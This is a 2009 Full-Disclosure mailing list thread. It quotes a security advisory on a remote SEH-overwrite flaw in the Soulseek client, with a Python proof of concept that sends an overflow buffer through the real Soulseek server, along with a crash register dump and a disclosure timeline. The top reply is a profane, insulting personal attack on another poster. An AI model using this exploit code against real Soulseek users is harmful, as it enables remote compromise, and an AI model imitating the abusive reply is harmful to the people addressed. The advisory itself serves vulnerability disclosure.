It seem like you're an asshole, and also it seems you have some undisclosed brain-prick activity, which mean that i should foward all the spams i get to you , including "*Ritalin solution"*, get valium, and clearly: enlarge your penis ( as your girlfriend asked me to do that call for you )
Now if you please, get the fuck out of this mailing list, and get a life kid. 009/6/5 Pete Licoln <[email protected]> > Seems like you have a problem with responsible disclosure Kid ; > Do you have any familly relationship with jeremy Brown ? ;P > > > http://g-laurent.blogspot.com/2009/05/soulseek-p2p-remote-distributed-search.html#comments > > 2009/5/25 Pete Licoln <[email protected]> > > Oh so you have a blog ... >> http://g-laurent.blogspot.com/ >> >> 2009/5/25 laurent gaffie <[email protected]> >> >>> ============================================= >>> - Release date: May 24th, 2009 >>> - Discovered by: Laurent GaffiƩ >>> - Severity: critical >>> ============================================= >>> >>> I. VULNERABILITY >>> ------------------------- >>> Soulseek 157 NS * & 156.* Remote Distributed Search Code Execution >>> >>> II. BACKGROUND >>> ------------------------- >>> "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file >>> >>> sharing application. >>> One of the things that makes Soulseek(tm) unique is our community and >>> community-related features. >>> Based on peer-to-peer technology, virtual rooms allow you to meet people >>> with >>> the same interests, share information, and chat freely using real-time >>> messages >>> in public or private. >>> Soulseek(tm), with its built-in people matching system, is a great way to >>> make >>> new friends and expand your mind!" >>> >>> III. DESCRIPTION >>> ------------------------- >>> Soulseek client allows distributed file search to one person, everyone, >>> or in a >>> specific Soulseek IRC channel, allowing a user to find the files he >>> wants, in >>> a dedicated channel, or with his contacts, or on the whole network. >>> Unfortunatly this feature is vulnerable to a remote SEH overwrite to a >>> specific >>> user, or even to a whole Soulseek IRC channel. >>> >>> IV. PROOF OF CONCEPT >>> ------------------------- >>> This proof of concept is made to prevent a S-K party, it is only build to >>> >>> target the user "testt4321". >>> >>> To try this proof of concept, you would have to open a soulseek client >>> and use >>> the username: >>> "testt4321" >>> with the password: >>> "12345678" >>> And launch this code. >>> If you want to change the username or target a whole channel, you would >>> have >>> to reverse the binary protocol >>> >>> >>> >>> #!/usr/bin/python >>> import struct >>> import sys, socket >>> from time import * >>> >>> s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) >>> s.connect(("208.76.170.50",2242)) # Change to Port 2240 for 156* branch >>> >>> buffer = >>> "\x48\x00\x00\x00\x01\x00\x00\x00\x08\x00\x00\x00\x74\x65\x73\x74" >>> buffer+= >>> "\x34\x33\x32\x31\x08\x00\x00\x00\x31\x32\x33\x34\x35\x36\x37\x38" >>> buffer+= >>> "\xb5\x00\x00\x00\x20\x00\x00\x00\x38\x65\x39\x31\x66\x37\x33\x30" >>> buffer+= >>> "\x35\x35\x37\x31\x32\x35\x64\x37\x34\x39\x32\x34\x62\x64\x66\x35" >>> buffer+= "\x63\x32\x39\x61\x36\x37\x64\x61\x01\x00\x00\x00" >>> >>> s.send(buffer) >>> sleep(1) >>> >>> junk = "\x41" * 3084 >>> next_seh = struct.pack('<L', 0x42424242) >>> seh = struct.pack('<L', 0x43434343) >>> other_junk = "\x61" * 1423 >>> >>> buffer2 = >>> "\x01\x0f\x00\x00\x2a\x00\x00\x00\x09\x00\x00\x00\x74\x65\x73\x74" >>> buffer2+= >>> "\x74\x34\x33\x32\x31\xa4\x5a\x51\x44\xe8\x0e\x00\x00"+junk+next_seh+seh+other_junk >>> s.send(buffer2) >>> sleep(1) >>> s.recv(1024) >>> >>> >>> >>> After the query is send, the memory will look like this >>> 0012FBE4 41414141 >>> 0012FBE8 42424242 Pointer to next SEH record >>> 0012FBEC 43434343 SE handler >>> 0012FBF0 61616161 >>> >>> And the program will terminate with this structure: >>> EAX 00000000 >>> ECX 43434343 >>> EDX 7C9132BC ntdll.7C9132BC >>> EBX 00000000 >>> ESP 0012EA78 >>> EBP 0012EA98 >>> ESI 00000000 >>> EDI 00000000 >>> EIP 43434343 >>> >>> >>> V. BUSINESS IMPACT >>> ------------------------- >>> An attacker could exploit this vulnerability to compromise any Soulseek >>> client connected to >>> the Soulseek network. >>> >>> VI. SYSTEMS AFFECTED >>> ------------------------- >>> Windows all versions running Soulseek * >>> >>> VII. SOLUTION >>> ------------------------- >>> A fast solution would be to use Nicotine-Plus ( >>> http://nicotine-plus.sourceforge.net/) >>> a Python Soulseek client. >>> Another quick workaround (at server level) would be to limit the search >>> query lenght. >>> >>> VIII. REFERENCES >>> ------------------------- >>> http://www.slsknet.org >>> >>> IX. CREDITS >>> ------------------------- >>> This vulnerability has been discovered by Laurent GaffiƩ >>> Laurent.gaffie{remove-this}(at)gmail.com >>> >>> >>> X. REVISION HISTORY >>> ------------------------- >>> May 24, 2009: Initial release >>> >>> >>> XI. DISCLOSURE TIMELINE >>> ------------------------- >>> july 29, 2008: Bug discovered >>> September 03, 2008: Vendor contacted; no response. >>> October 14, 2008: Vendor contacted; still no response. >>> April 12, 2009: Idefense contacted. >>> April 13, 2009: Idefense answered. >>> April 23, 2009: Advisory send to idefense contributor program. >>> May 13, 2009: Idefense contacted, bug rejected (no reason given) >>> May 15, 2009: Idefense recontacted; no answer. >>> May 16, 2009: Last try to contact Soulseek maintainers >>> May 24, 2009: Advisory published. >>> >>> XII. LEGAL NOTICES >>> ------------------------- >>> The information contained within this advisory is supplied "as-is" >>> with no warranties or guarantees of fitness of use or otherwise. >>> I accept no responsibility for any damage caused by the use or >>> misuse of this information. >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> >> >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
